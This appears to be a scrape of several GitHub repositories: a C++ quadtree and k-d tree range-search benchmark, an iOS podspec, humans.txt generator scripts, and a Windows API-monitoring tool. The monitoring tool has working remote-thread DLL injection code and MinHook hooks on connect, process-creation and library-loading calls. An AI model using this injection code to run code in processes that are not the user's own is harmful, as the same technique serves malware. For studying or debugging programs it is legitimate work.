// Don't re-assign the points to new nodes;
// since the points are inserted already sorted by rank, the lowest ranks will always be first to be checked
//
// while (node->pts.size() > 0) {
// Point* p = node->pts.back();
// node->pts.pop_back();
// quadtree_insert(node, *p);
// }
// Re-call the insert on this node -- since we have now subdivided the tree,
// it will go into one of the new child nodes
return quadtree_insert(node, p);
}
}
return false;
}
#endif
<file_sep>//
// Gen.h
// ChurchillNavigationChallenge
//
// Created by <NAME> on 2/12/15.
// Copyright (c) 2015 ECC. All rights reserved.
//
#ifndef ChurchillNavigationChallenge_Gen_h
#define ChurchillNavigationChallenge_Gen_h
#include "Shared.h"
const int NUM_PTS = 50000;
const int MAX_PT_RANGE = 1024;
//const int NUM_PTS = 100000;
//const int MAX_PT_RANGE = std::numeric_limits<int>::max();
struct QueryResult {
int i;
int ct_bf;
int ct_qt;
int ct_kd;
float bf;
float qt;
float kd;
QueryResult() : i(0), ct_bf(0), ct_qt(0), bf(0), qt(0), kd(0), ct_kd(0) {}
};
static inline int rand_num() {
return rand() % MAX_PT_RANGE;
}
static inline float random_float(float a, float b) {
float random = ((float) rand()) / (float) RAND_MAX;
float diff = b - a;
float r = random * diff;
return a + r;
}
void generate_points(int ct, std::vector<Point*>& points)
{
points.resize(ct);
for (int i = 0; i < ct; i++) {
Point* p = new Point();
p->id = rand() % 10000;
p->rank = i;
while (p->x == 0) {
p->x = random_float(0, MAX_PT_RANGE);
}
while (p->y == 0) {
p->y = random_float(0, MAX_PT_RANGE);
}
points[i] = p;
}
}
void generate_queries(int ct, std::vector<Rect>& queries) {
for (int i = 0; i < ct; i++) {
int r = rand_num();
int r2 = rand_num();
queries.push_back(Rect(r/2, r, r2/2, r2));
}
}
#endif
<file_sep>//
// PBM.h
// ChurchillNavigationChallenge
//
// Created by <NAME> on 2/12/15.
// Copyright (c) 2015 ECC. All rights reserved.
//
//
//
// Simple struct for drawing and saving a PPM image
// http://en.wikipedia.org/wiki/Netppm_format#PPM_example
#ifndef ChurchillNavigationChallenge_ppm_h
#define ChurchillNavigationChallenge_ppm_h
#include <fstream>
// RGB 0-255 pixel struct
struct ppm {
public:
struct pixel {
unsigned char r;
unsigned g;
unsigned b;
pixel() : r(0), g(0), b(0) {}
pixel(unsigned char r, unsigned char g, unsigned char b) : r(r), g(g), b(b) {
if (r < 0) r = 0; if (r > 255) r = 255;
if (g < 0) g = 0; if (g > 255) g = 255;
if (b < 0) b = 0; if (b > 255) b = 255;
}
friend pixel operator/(const pixel &p1, const int divisor);
friend pixel operator-(const pixel &p1, const int sub);
friend pixel operator+(const pixel &p1, const int add);
friend bool operator==(const pixel &p1, const pixel& p2);
friend bool operator!=(const pixel &p1, const pixel& p2);
};
const static pixel white;
const static pixel black;
const static pixel blue;
const static pixel red;
const static pixel yellow;
const static pixel green;
std::string version = "P3";
std::string comment = "yesssssss";
int width;
int height;
std::vector<pixel> pixels;
// ppm constructor, NxN pixel vector
ppm(int w, int h) : width(w), height(h) { pixels.resize(width*height, ppm::pixel(0, 0, 0)); }
};
ppm::pixel inline operator/(const ppm::pixel &p1, const int divisor) {
if (divisor <= 0) return ppm::pixel(p1);
return ppm::pixel(p1.r / divisor, p1.g / divisor, p1.b / divisor);
}
ppm::pixel inline operator-(const ppm::pixel &p1, const int sub) {
return ppm::pixel(p1.r - sub, p1.g - sub, p1.b - sub);
}
ppm::pixel inline operator+(const ppm::pixel &p1, const int add) {
return ppm::pixel(p1.r + add, p1.g + add, p1.b + add);
}
bool operator==(const ppm::pixel& p1, const ppm::pixel& p2) {
return p1.r == p2.r && p1.g == p2.g && p1.b == p2.b;
}
bool inline operator!=(const ppm::pixel& p1, const ppm::pixel& p2) {
return !(p1 == p2);
}
const ppm::pixel ppm::white = ppm::pixel(255,255,255);
const ppm::pixel ppm::black = ppm::pixel(0,0,0);
const ppm::pixel ppm::blue = ppm::pixel(0,0,255);
const ppm::pixel ppm::red = ppm::pixel(255,0,0);
const ppm::pixel ppm::yellow = ppm::pixel(252,255,0);
const ppm::pixel ppm::green = ppm::pixel(90,255,0);
// Get the position within the NxN array for this pixel
static inline int ppm_get_pos(ppm& img, int x, int y) {
int pos = (y * img.width) + x;
if (pos >= img.width*img.height) pos = img.width*img.height - 1;
return pos;
}
// Draw a horizontal line on the image at the y pixel from x start to end
// Arguments
// img - referene to ppm image to draw on
// y - y axis to draw along
// start - x position to start at
// end - x position to end at
// c - draw color
// override - draw over whatever pixels have already been drawn
static inline void ppm_draw_line_horiz(ppm& img, int y, int start, int end, ppm::pixel c, bool override=false) {
// out of bounds error checking
if (y < 0) y = 0;
if (y > img.height-1) y = img.height-1;
if (start < 0) start = 0;
if (start > img.width-1) start = img.width - 1;
if (end < 0) end = 0;
if (end > img.width - 1) end = img.width - 1;
for (int x = start; x < end; x++) {
int pos = ppm_get_pos(img, x, y);
if (img.pixels[pos].r == 0 || override==true)
img.pixels[pos] = c;
}
}
// Draw a vertical line on the image at the x pixel from y start to end
// Arguments
// img - referene to ppm image to draw on
// x - x axis to draw along
// start - y position to start at
// end - y position to end at
// c - draw color
// override - draw over whatever pixels have already been drawn
static inline void ppm_draw_line_vert(ppm& img, int x, int start, int end, ppm::pixel c, bool override=false) {
// out of bounds error checking
if (x < 0) x = 0;
if (x > img.width-1) x = img.width-1;
if (start < 0) start = 0;
if (start > img.height-1) start = img.height - 1;
if (end < 0) end = 0;
if (end > img.height - 1) end = img.height - 1;
for (int y = start; y < end; y++) {
int pos = ppm_get_pos(img, x, y);
if (img.pixels[pos].r == 0 || override==true)
img.pixels[pos] = c;
}
}
// Draw a rectangle(unfilled) on the image
static void ppm_draw_rect(ppm& img, Rect& rect, ppm::pixel c, bool override=false) {
ppm_draw_line_horiz(img, rect.ly, rect.lx, rect.hx, c, override);
ppm_draw_line_horiz(img, rect.hy, rect.lx, rect.hx, c, override);
ppm_draw_line_vert(img, (int)rect.lx, (int)rect.ly, (int)rect.hy, c, override);
ppm_draw_line_vert(img, (int)rect.hx, (int)rect.ly, (int)rect.hy, c, override);
}
// Draw a rectangle(filled) on the image
static inline void ppm_draw_rect_fill(ppm& img, Rect& rect, ppm::pixel c) {
for (int i = rect.lx; i < rect.hx; i++) {
ppm_draw_line_vert(img, i, (int)rect.ly, (int)rect.hy, c, true);
}
ppm_draw_rect(img, rect, ppm::pixel(c.r + 20, c.g + 20, c.b + 20), true);
}
// Set the RGB value for an individual pixel
static inline void ppm_set_pt(ppm& img, int x, int y, ppm::pixel c) {
if (x < 0) x = 0;
if (x > img.width-1) x = img.width-1;
if (y < 0) y = 0;
if (y > img.height-1) y = img.height-1;
int pos = ppm_get_pos(img, x, y);
if (img.pixels[pos] != ppm::yellow)
img.pixels[pos] = c;
}
// Helper method for drawing out QuadTree node boundaries. PPM image should be the same size
// as the root node of the quadtree, or point values should be converted to match the scale
// This method is completely optional and not associated with a PPM image
static void ppm_draw_quadtree(ppm& img, QuadTree* tree, ppm::pixel point_color) {
// Draw all points within this leaf
for (int i = 0; i < tree->pts.size(); i++) {
ppm_set_pt(img, tree->pts[i]->x, tree->pts[i]->y, point_color);
}
// recursively draw all 4 sub nodes of this tree node
if (tree->nw != 0) {
ppm_draw_quadtree(img, tree->nw, point_color);
ppm_draw_quadtree(img, tree->ne, point_color);
ppm_draw_quadtree(img, tree->sw, point_color);
ppm_draw_quadtree(img, tree->se, point_color);
}
// draw the boundary rectangle last so it overrides points and child nodes
ppm_draw_rect(img, tree->bounds, ppm::white - (tree->depth * 30), true);
}
// Helper method for drwaing out KdTree node boundaries. PPM image should be the same size
// as the root node of the KdTree, or point values should be converted to match the scale
// This method is completely optional and not associated with a PPM image
static void ppm_draw_kdtree(ppm& img, KdTree* tree, ppm::pixel point_color) {
// Draw all points within this leaf
for (int i = 1; i < tree->points.size(); i++) {
ppm_set_pt(img, tree->points[i]->x, tree->points[i]->y, point_color);
}
// Recursively draw the left subdivision
if (tree->left != 0)
ppm_draw_kdtree(img, tree->left, point_color);
// Recursively draw the right subdivision
if (tree->right != 0)
ppm_draw_kdtree(img, tree->right, point_color);
// Draw the median axis lines, depending on the depth (even - X, odd - Y)
if (tree->points.size() != 0) {
if (tree->depth % 2 == 0)
ppm_draw_line_vert(img, tree->points[0]->x, tree->bounds.ly, tree->bounds.hy, ppm::white - (tree->depth * 15), true);
else
ppm_draw_line_horiz(img, tree->points[0]->y, tree->bounds.lx, tree->bounds.hx, ppm::white - (tree->depth * 15), true);
// ppm_draw_rect(img, tree->bounds, ppm::red, true);
}
// Draw the median point of this node in yellow
if (tree->points.size() > 0) {
for (int i = 0; i < 1; i++) {
ppm_set_pt(img, tree->points[i]->x, tree->points[i]->y, ppm::yellow);
}
}
}
static void ppm_write(ppm& img, std::string outfile) {
// Open output stream
std::ofstream ofs (outfile, std::ofstream::out);
// Write the header
// [Version]
// [Width] [Height]
// [Max Color]
ofs << img.version << '\n';
ofs << "#" << img.comment << '\n';
ofs << img.width << " " << img.height << '\n';
ofs << "255" << '\n';
// Write pixels
// Each row should have a newline character at the end;
for (int y = 0; y < img.height; y++) {
for (int x = 0; x < img.width; x++) {
int pos = y * img.width + x;
ofs << (int)img.pixels[pos].r << " " << (int)img.pixels[pos].g << " " << (int)img.pixels[pos].b << " ";
}
ofs << '\n';
}
ofs.close();
}
#endif
<file_sep>//
// Shared.h
// ChurchillNavigationChallenge
//
// Created by <NAME> on 2/9/15.
// Copyright (c) 2015 ECC. All rights reserved.
//
#ifndef ChurchillNavigationChallenge_Shared_h
#define ChurchillNavigationChallenge_Shared_h
#include <vector>
#include <queue>
struct QuadTree;
struct KdTree;
struct Point
{
short id;
int rank;
float x;
float y;
Point() : id(0), rank(0), x(0), y(0) {}
Point(const Point&) {}
bool operator()(const Point& l, const Point& r)
{
return l.rank < r.rank;
}
};
struct Rect
{
float lx;
float ly;
float hx;
float hy;
Rect() {
lx = 0;
ly = 0;
hx = 0;
hy = 0;
}
Rect(float lx, float hx, float ly, float hy) : lx(lx), hx(hx), ly(ly), hy(hy) {}
Rect(const Rect& other) { lx = other.lx; ly = other.ly; hx = other.hx; hy = other.hy; }
};
#endif
<file_sep>//
// main.cpp
// ChurchillNavigationChallenge
//
// Created by <NAME> on 2/9/15.
// Copyright (c) 2015 ECC. All rights reserved.
//
#include <stdlib.h>
#include <fstream>
#include <iostream>
#include <chrono>
#include <cassert>
#include "Shared.h"
#include "Util.h"
#include "QuadTree.h"
#include "KdTree.h"
#include "Gen.h"
#define RENDER_QUADTREE
#ifdef RENDER_QUADTREE
#include "PPM.h"
ppm quadtree_img(1024, 1024);
ppm kdtree_img(1024, 1024);
#endif
std::vector<QueryResult> query_results;
std::vector<Rect> queries;
QuadTree* qt;
KdTree* kdt;
std::vector<Point*> points;
void setup_data(int num_search_queries, int num_points, int max_point_range);
void execute_searches();
void display_search_results();
int main(int argc, const char * argv[])
{
/* initialize random seed: */
srand (1000000000000);//time(NULL)
// Setup the Search Query, Points, QuadTree, and KdTree data
setup_data(1, NUM_PTS, MAX_PT_RANGE);
#ifdef RENDER_QUADTREE
// Render the QuadTree and KdTree to simple PPM images for visual debugging of subdivision and point dispersement
ppm_draw_quadtree(quadtree_img, qt, ppm::pixel(75, 75, 145));
ppm_draw_kdtree(kdtree_img, kdt, ppm::pixel(75, 75, 145));
// Output the quadtree and kdtree PPM images
ppm_write(quadtree_img, "/Users/ericc/Desktop/quadtree.pbm");
ppm_write(kdtree_img, "/Users/ericc/Desktop/kdtree.pbm");
#endif
execute_searches();
display_search_results();
// Clean up heap allocations
quadtree_delete(qt);
kdtree_delete(kdt);
for (int i = 0; i < points.size(); i++) {
delete points[i];
points[i] = 0;
}
return 0;
}
void setup_data(int num_search_queries, int num_points, int max_point_range) {
// Generate random 2D rectangular search queries
generate_queries(num_search_queries, queries);
// Generate NUM_PTS points
generate_points(num_points, points);
// Time measurement
auto start = std::chrono::steady_clock::now();
auto end = std::chrono::steady_clock::now();
auto diff = end - start;
// Create the QuadTree and insert the points vector
/////
qt = quadtree_construct(Rect(0, max_point_range, 0, max_point_range), 0);
int insert_ct = 0;
quadtree_insert(qt, points, insert_ct);
/////
end = std::chrono::steady_clock::now();
diff = end - start;
std::cout << "QuadTree Creation Time: " << std::chrono::duration <double, std::milli> (diff).count() << " ms" << std::endl;
start = std::chrono::steady_clock::now();
// Create the KdTree and insert the points vector
/////
kdt = kdtree_construct(Rect(0, max_point_range, 0, max_point_range), 0);
kdtree_insert(kdt, points);
/////
end = std::chrono::steady_clock::now();
diff = end - start;
std::cout << "KdTree Creation Time: " << std::chrono::duration <double, std::milli> (diff).count() << " ms" << std::endl;
}
void execute_searches() {
// Measure search times
auto start = std::chrono::steady_clock::now();
auto end = std::chrono::steady_clock::now();
auto diff = end - start;
int i = 0;
for (std::vector<Rect>::iterator q = queries.begin() ; q != queries.end(); ++q) {
#ifdef RENDER_QUADTREE
ppm_draw_rect_fill(quadtree_img, *q, ppm::pixel(15, 15, 15));
ppm_draw_rect_fill(kdtree_img, *q, ppm::pixel(15, 15, 15));
#endif
i++;
// Priority queues for keeping a sorted list of the 20 lowest ranked points
std::priority_queue<Point*, std::vector<Point*>> results, results2, results3;
QueryResult qr;
qr.i = i;
start = std::chrono::steady_clock::now();
// Do a brute force search of all points in O(N^2) time
for (int i = 0; i < points.size(); i++) {
if (pt_contained(*q, *points[i]))
results.push(points[i]);
}
end = std::chrono::steady_clock::now();
diff = end - start;
qr.bf = std::chrono::duration <double, std::milli> (diff).count();
qr.ct_bf = results.size();
// Search quadtree in ~O(log N) time
start = std::chrono::steady_clock::now();
int ct = 0;
quadtree_search(qt, *q, results2, ct);
end = std::chrono::steady_clock::now();
diff = end - start;
qr.qt = std::chrono::duration <double, std::milli> (diff).count();
qr.ct_qt = results2.size();
// Search KdTree in O(n^(1-1/k) + m) time, where m is the number of the reported points, and k the dimension of the k-d tree
start = std::chrono::steady_clock::now();
kdtree_search(kdt, *q, results3, ct);
end = std::chrono::steady_clock::now();
diff = end - start;
qr.kd = std::chrono::duration <double, std::milli> (diff).count();
qr.ct_kd = results3.size();
#ifdef RENDER_QUADTREE
while (results2.size() > 0) {
ppm_set_pt(quadtree_img, results2.top()->x, results2.top()->y, ppm::green);
results2.pop();
}
while (results3.size() > 0) {
ppm_set_pt(kdtree_img, results3.top()->x, results3.top()->y, ppm::green);
results3.pop();
}
#endif
query_results.push_back(qr);
}
std::cout << std::endl;
}
void display_search_results() {
float avg_bf = 0;
float avg_qt = 0;
float avg_kd = 0;
// Display search results
for (std::vector<QueryResult>::iterator q = query_results.begin() ; q != query_results.end(); ++q) {
std::cout << "=============================================" << std::endl;
std::cout << "QUERY " << (*q).i << std::endl;
std::cout << " " << std::endl;
std::cout << "Brute Force Time: " << (*q).bf << " ms" << std::endl;
std::cout << "Brute Force Results: " << (*q).ct_bf << std::endl;
std::cout << " " << std::endl;
std::cout << "QuadTree Time: " << (*q).qt << " ms" << std::endl;
std::cout << "QuadTree Results: " << (*q).ct_qt << std::endl;
std::cout << " " << std::endl;
std::cout << "KdTree Time: " << (*q).kd << " ms" << std::endl;
std::cout << "KdTree Results: " << (*q).ct_kd << std::endl;
std::cout << " " << std::endl;
avg_bf += (*q).bf;
avg_qt += (*q).qt;
avg_kd += (*q).kd;
}
// Calculate search time averages
avg_bf /= query_results.size();
avg_qt /= query_results.size();
avg_kd /= query_results.size();
// Display search averages
std::cout << "AVG Brute Force Search Time: " << avg_bf << " ms" << std::endl;
std::cout << "AVG Quad Tree Search Time: " << avg_qt << " ms" << std::endl;
std::cout << "AVG KdTree Search Time : " << avg_kd << " ms" << std::endl;
}
<file_sep>//
// Util.h
// ChurchillNavigationChallenge
//
// Created by <NAME> on 2/12/15.
// Copyright (c) 2015 ECC. All rights reserved.
//
#ifndef ChurchillNavigationChallenge_Util_h
#define ChurchillNavigationChallenge_Util_h
#include "Shared.h"
// true if r1 intersects r2
static bool inline rects_intersect(const Rect& r1, const Rect& r2) {
if (r2.lx > r1.hx || r2.ly > r1.hy || r2.hx < r1.lx || r2.hy < r1.ly)
return false;
return true;
}
// true if r1 fully contains r2
static bool inline rects_contained(const Rect& r1, const Rect& r2) {
if ((r1.lx <= r2.lx && r1.hx >= r2.hx) && r1.ly <= r2.ly && r1.hy >= r2.hy) return true;
return false;
}
// true if r contains p
static bool inline pt_contained(const Rect& r, const Point& p) {
return (r.lx <= p.x && r.hx >= p.x) && (r.ly <= p.y && r.hy >= p.y);
}
static inline void print_point(const Point& p) {
printf("[Point x=%f y=%f]\n", p.x, p.y);
}
static inline void print_rect(Rect& rect) {
printf("[Rect %4.f %4.f %4.f %4.f]\n", rect.lx, rect.hx, rect.ly, rect.hy);
}
#endif
<file_sep># ChurchillNavigationChallenge
http://churchillnavigation.com/challenge/
Efficient range searching of 10 million+ 2D points using a QuadTree or a 2D KdTree
## QuadTree Subdivisions and 2d Point Dispersement

## KdTree Subdivisions and 2d Point Dispersement
 | 7266d24de88c309614fee6f89d49fe5dccfa58ef | [
"Markdown",
"C",
"C++"
] | 8 | C++ | ericc59/ChurchillNavigationChallenge | 4a7ce2e30975e2bc3d959e75c8c1242fa8c4a957 | 35836e95be5b8e35a37e51e365e5d0549ad8f858 |
refs/heads/master | <file_sep>Pod::Spec.new do |s|
s.name = "WWZKit"
s.version = "1.2.4"
s.summary = "A short description of WWZKit."
s.homepage = "https://github.com/ccwuzhou/WWZKit"
s.license = "MIT"
# s.license = { :type => "MIT", :file => "FILE_LICENSE" }
s.author = { "wwz" => "<EMAIL>" }
s.platform = :ios
s.ios.deployment_target = "8.0"
s.source = { :git => "https://github.com/ccwuzhou/WWZKit.git", :tag => "#{s.version}"}
# s.public_header_files = "WWZKit/WWZKit.h"
s.source_files = "WWZKit/*.h"
s.requires_arc = true
s.framework = "UIKit"
# s.default_subspecs = 'Model'
s.subspec 'UIKit+WWZ' do |ss|
ss.source_files = "UIKit+WWZ/*.{h,m}"
end
s.subspec 'WWZKit' do |ss|
ss.subspec 'Model' do |sss|
sss.source_files = "WWZKit/Model/*.{h,m}"
end
ss.subspec 'Controller' do |sss|
sss.source_files = "WWZKit/Controller/*.{h,m}"
end
ss.subspec 'View' do |sss|
sss.source_files = "WWZKit/View/*.{h,m}"
sss.dependency "WWZKit/WWZKit/Model"
sss.dependency "WWZKit/UIKit+WWZ"
end
ss.subspec 'Cell' do |sss|
sss.source_files = "WWZKit/Cell/*.{h,m}"
end
end
end
| fbca93a3dcae5ba429d7143f5b8e1f2f5fd2b15b | [
"Ruby"
] | 1 | Ruby | ccwuzhou/WWZKit | 0036810c2d6c9be330aa1b0b14e76846bab251bf | e6edff960ae7f21885943a47111b2a705925ab17 |
refs/heads/master | <file_sep>cat top.txt > humans.txt;
echo '/* TEAM */' >> humans.txt;
echo '' >> humans.txt;
ruby parse.rb >> humans.txt;
echo '' >> humans.txt;
cat bottom.txt >> humans.txt;
<file_sep>humans.txt
==========
From [humanstxt.org](http://humanstxt.org/):
> It's an initiative for knowing the people behind a website. It's a TXT file that contains information about the different people who have contributed to building the website.
This repository simply contains a couple scripts that fetches the latest [staff roster](https://github.com/ExpoTV/Staff-Roster) and parses it out to a text file.
To generate:
chmod +x build.sh
./build.sh
<file_sep>require 'open-uri'
yml_str = open('https://raw.githubusercontent.com/ExpoTV/Staff-Roster/gh-pages/_data/staff.yml').read;
require 'yaml'
staff = YAML.load(yml_str)
staff.each { |department|
puts department['name']
puts '=' * department['name'].length
department['members'].each { |e|
# puts e
print e['name']
print ' [' + '@' + e['twitter'] + ']' if e['twitter']
# print ' ~ ' + 'https://github.com/' + e['github'] if e['github']
# print ' ~ ' + e['website'] if e['website']
puts "\n"
}
puts "\n"
}
| 72ef9c66198b00e6f143defc9d196a986d169069 | [
"Markdown",
"Ruby",
"Shell"
] | 3 | Shell | ExpoTV/humans.txt | 29279c6c8b45284171813b3ce86989506bc54d82 | 87cc9800428545334fa26a8445220df39cb899c8 |
refs/heads/master | <file_sep>#include "logger.h"
#pragma once
// standard information for every hook
struct HOOK_INFO {
LPCWSTR lib;
LPCSTR target;
LPVOID proxy;
LPVOID fp;
};
// logger object - exposes a stream to report to the IPC channel
Logger logger;
// Proxy Function Definitions
//============================================
typedef int (WINAPI *CONNECT)(SOCKET, const SOCKADDR*, int);
typedef int (WINAPI *CREATEPROCESSINTERNALW)(HANDLE, LPCWSTR, LPWSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCWSTR, LPSTARTUPINFOW, LPPROCESS_INFORMATION, PHANDLE);
typedef int (WINAPI *LOADLIBRARYEXW)(LPCWSTR, HANDLE, DWORD);
typedef int (WINAPI *LOADLIBRARYW)(LPCWSTR);
typedef int (WINAPI *LOADLIBRARYA)(LPCSTR);
typedef FARPROC (WINAPI *GETPROCADDRESS)(HMODULE, LPCSTR);
// Trampoline Function Declarations
//============================================
GETPROCADDRESS fpGetProcAddress= NULL;
LOADLIBRARYA fpLoadLibraryA= NULL;
LOADLIBRARYW fpLoadLibraryW= NULL;
LOADLIBRARYEXW fpLoadLibraryExW= NULL;
CONNECT fpConnect= NULL;
CREATEPROCESSINTERNALW fpCreateProcessInternalW= NULL;
// Proxy Functions
//============================================
int WINAPI ProxyConnect(SOCKET s, const sockaddr* name, int namelen)
{
/*
** dynamically loading the WSAAddressToStringW function from the ws2_32 dll in order to
** resolve a standard IP dot notation from the sockaddr struct. uses GetModuleHandle so the
** ws2_32 dll isn't loaded if the target process isn't using it (no need to hook in that case)
*/
typedef int (WINAPI *WSAADDRESSTOSTRINGW)(LPSOCKADDR, DWORD, LPDWORD, LPWSTR, LPDWORD);
HMODULE hModule= GetModuleHandle("ws2_32");
WSAADDRESSTOSTRINGW WSAAddressToStringW= (WSAADDRESSTOSTRINGW) GetProcAddress(hModule, "WSAAddressToStringW");
wchar_t addr[32];
DWORD sz= 32;
WSAAddressToStringW((SOCKADDR *)name, namelen, NULL, addr, &sz);
logger << L"[HOOK] Intercepted call to connect:\n" << L"- IP Address: " << addr << std::endl;
return fpConnect(s, name, namelen);
}
int WINAPI ProxyCreateProcessInternalW
(HANDLE hToken,
LPCWSTR lpApplicationName,
LPWSTR lpCommandLine,
LPSECURITY_ATTRIBUTES lpProcessAttributes,
LPSECURITY_ATTRIBUTES lpThreadAttributes,
BOOL bInheritHandles,
DWORD dwCreationFlags,
LPVOID lpEnvironment,
LPCWSTR lpCurrentDirectory,
LPSTARTUPINFOW lpStartupInfo,
LPPROCESS_INFORMATION lpProcessInformation,
PHANDLE hNewToken)
{
logger << L"[HOOK] Intercepted call to CreateProcessInternalW:\n" << L"- Application Name: " << lpCommandLine << std::endl;
return fpCreateProcessInternalW(hToken, lpApplicationName, lpCommandLine, lpProcessAttributes, lpThreadAttributes, bInheritHandles, dwCreationFlags, lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation, hNewToken);
}
int WINAPI ProxyLoadLibraryExW(LPCWSTR lpLibFileName, HANDLE hFile, DWORD dwFlags)
{
logger << L"[HOOK] Intercepted call to LoadLibraryExW:\n" << L"- Library Name: " << lpLibFileName << std::endl;
return fpLoadLibraryExW(lpLibFileName, hFile, dwFlags);
}
int WINAPI ProxyLoadLibraryW(LPCWSTR lpLibFileName)
{
logger << L"[HOOK] Intercepted call to LoadLibraryW:\n" << L"- Library Name: " << lpLibFileName << std::endl;
return fpLoadLibraryW(lpLibFileName);
}
int WINAPI ProxyLoadLibraryA(LPCSTR lpLibFileName)
{
wchar_t wLibName[128];
MultiByteToWideChar(CP_THREAD_ACP, (DWORD)0, lpLibFileName, -1, wLibName, 128);
logger << L"[HOOK] Intercepted call to LoadLibraryA:\n" << L"- Library Name: " << wLibName << std::endl;
return fpLoadLibraryA(lpLibFileName);
}
FARPROC WINAPI ProxyGetProcAddress(HMODULE hModule, LPCSTR lpProcName)
{
wchar_t wProcName[128];
MultiByteToWideChar(CP_THREAD_ACP, (DWORD)0, lpProcName, -1, wProcName, 128);
logger << L"[HOOK] Intercepted call to GetProcAddress:\n" << L"- Function Name: " << wProcName << std::endl;
return fpGetProcAddress(hModule, lpProcName);
}
<file_sep>#include <windows.h>
#include <iostream>
#include "MinHook.h"
#include "monitor.h"
#include "logger.h"
#pragma comment(lib, "libMinHook-x86mt.lib")
// Hooks that will be installed (see monitor.h)
//============================================
HOOK_INFO hooks[]= {
{
L"ws2_32",
"connect",
&ProxyConnect,
&fpConnect
},
{
L"kernelbase",
"CreateProcessInternalW",
&ProxyCreateProcessInternalW,
&fpCreateProcessInternalW
},
{
L"kernel32",
"LoadLibraryExW",
&ProxyLoadLibraryExW,
&fpLoadLibraryExW
},
{
L"kernel32",
"LoadLibraryW",
&ProxyLoadLibraryW,
&fpLoadLibraryW
},
{
L"kernel32",
"LoadLibraryA",
&ProxyLoadLibraryA,
&fpLoadLibraryA
},
{
L"kernel32",
"GetProcAddress",
&ProxyGetProcAddress,
&fpGetProcAddress
}
};
// Hook installation functions
//============================================
__forceinline BOOL install_hook(HOOK_INFO *pHookInfo)
{
if (MH_CreateHookApi(pHookInfo->lib, pHookInfo->target, pHookInfo->proxy, (LPVOID *)(pHookInfo->fp)) != MH_OK)
return FALSE;
return TRUE;
}
VOID install_all()
{
int numElts= sizeof(hooks)/sizeof(hooks[0]);
for (int i= 0; i < numElts; i++)
{
if (install_hook(&hooks[i]))
logger << L"[+] Installed hook in: " << hooks[i].target << "\n";
}
}
// DLL entry
//============================================
BOOL WINAPI DllMain(HINSTANCE const instance, DWORD const reason, LPVOID const reserved)
{
switch (reason)
{
case DLL_PROCESS_ATTACH:
logger << L"[+] Installing hooks...\n";
MH_Initialize();
install_all();
MH_EnableHook(MH_ALL_HOOKS);
logger << L"[+] Hooks installed, Resuming main thread..." << std::endl;
break;
}
return TRUE;
}
<file_sep>#include <windows.h>
#include <iostream>
#include <tchar.h>
#pragma comment(lib, "shell32.lib")
// Inject a DLL with CreateRemoteThread
//====================================================
void inject_DLL(TCHAR *dllPath, HANDLE process)
{
LPVOID lpBaseAddress;
HANDLE hRemoteThread;
HMODULE kernel32;
FARPROC loadlibrary;
SIZE_T pathLen;
lpBaseAddress= NULL;
hRemoteThread= NULL;
loadlibrary= NULL;
kernel32= NULL;
pathLen= _tcslen(dllPath) * sizeof(TCHAR);
kernel32= GetModuleHandle(_T("kernel32.dll"));
loadlibrary= GetProcAddress(kernel32, _T("LoadLibraryA"));
lpBaseAddress= VirtualAllocEx(process, NULL, pathLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (lpBaseAddress == NULL)
std::cout << "VirtualAllocEx failed: " << GetLastError() << std::endl;
if (!WriteProcessMemory(process, lpBaseAddress, dllPath, pathLen, NULL))
std::cout << "WriteProcessMemory failed: " << GetLastError() << std::endl;
hRemoteThread= CreateRemoteThread(process, NULL, 0, (LPTHREAD_START_ROUTINE)(VOID *)loadlibrary, lpBaseAddress, NULL, 0);
if (hRemoteThread == NULL)
std::cout << "CreateRemoteThread failed: " << GetLastError() << std::endl;
WaitForSingleObject(hRemoteThread, INFINITE);
CloseHandle(hRemoteThread);
}
// Open a log generated by the monitor
//====================================================
void open_log(TCHAR *exePath)
{
TCHAR logPath[MAX_PATH + 4]= {0};
exePath[_tcslen(exePath) - 4]= '\0';
_tcscat(logPath, exePath);
_tcscat(logPath, "_log.txt");
ShellExecute(0, 0, logPath, 0, 0 , SW_SHOW );
}
// Entry: Createprocess (suspended) > inject > resume
//====================================================
int main(int argc, TCHAR *argv[])
{
STARTUPINFO si;
PROCESS_INFORMATION pi;
TCHAR *targetExe;
TCHAR *dllName;
TCHAR dllPath[MAX_PATH];
SIZE_T pathLen;
HANDLE serverThread;
if (argc < 3)
{
std::cout << "Not enough arguments\n" << "Usage: injector.exe <target> <dll>\n";
return 1;
}
targetExe= _T(argv[1]);
dllName= _T(argv[2]);
GetFullPathName(dllName, MAX_PATH, dllPath, NULL);
ZeroMemory( &si, sizeof(si));
ZeroMemory( &pi, sizeof(pi));
si.cb = sizeof(si);
if(!CreateProcess(NULL, targetExe, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
{
std::cout << "CreateProcess failed: " << GetLastError() << std::endl;
return 1;
}
inject_DLL(dllPath, pi.hProcess);
ResumeThread(pi.hThread);
WaitForSingleObject(pi.hProcess, INFINITE);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
open_log(targetExe);
return 0;
}<file_sep>### Description
This is a basic API monitoring program for running windows executables and intercepting their calls to the WinAPI. It uses minhook as an inline hooking engine and DLL injection as the process injection technique.
#### injector
The injector uses DLL injection and may be flagged by AV as it uses common API calls found in malware injection.
- Creates target process as suspended
- Writes to process space with VirtualAlloc and WriteProcessMemory
- Executes remote thread to load the monitor DLL and install hooks
- Resumes target thread after hooks have been installed
#### monitor
The monitor, once injected, installs hooks that report intercepted calls made by the injected process. **Compilation:** use `/LD` (MSVC compiler) to create as a DLL. The monitor depends on [minhook](https://github.com/TsudaKageyu/minhook) so be sure to link that library and use the minhook.h header.
#### todo
- add native (Nt/Zw) hooks
| a8d509126e49e9fdfddb5045cef05ee9ea862bb0 | [
"Markdown",
"C++"
] | 4 | C++ | ra2003/win-api-monitor | 73e23ae7d38c250f9bf4b029dd2a11bbc134e488 | cf296cd5d9aeade2d8c438d1181b4382a1476134 |
refs/heads/master | <file_sep>
#include <frigg/debug.hpp>
#include <arch/io_space.hpp>
#include "../arch/x86/cpu.hpp"
#include "../arch/x86/hpet.hpp"
#include "../generic/fiber.hpp"
#include "../generic/io.hpp"
#include "../generic/kernel_heap.hpp"
#include "../generic/service_helpers.hpp"
#include "pci/pci.hpp"
#include "fb.hpp"
#include "boot-screen.hpp"
#include <mbus.frigg_pb.hpp>
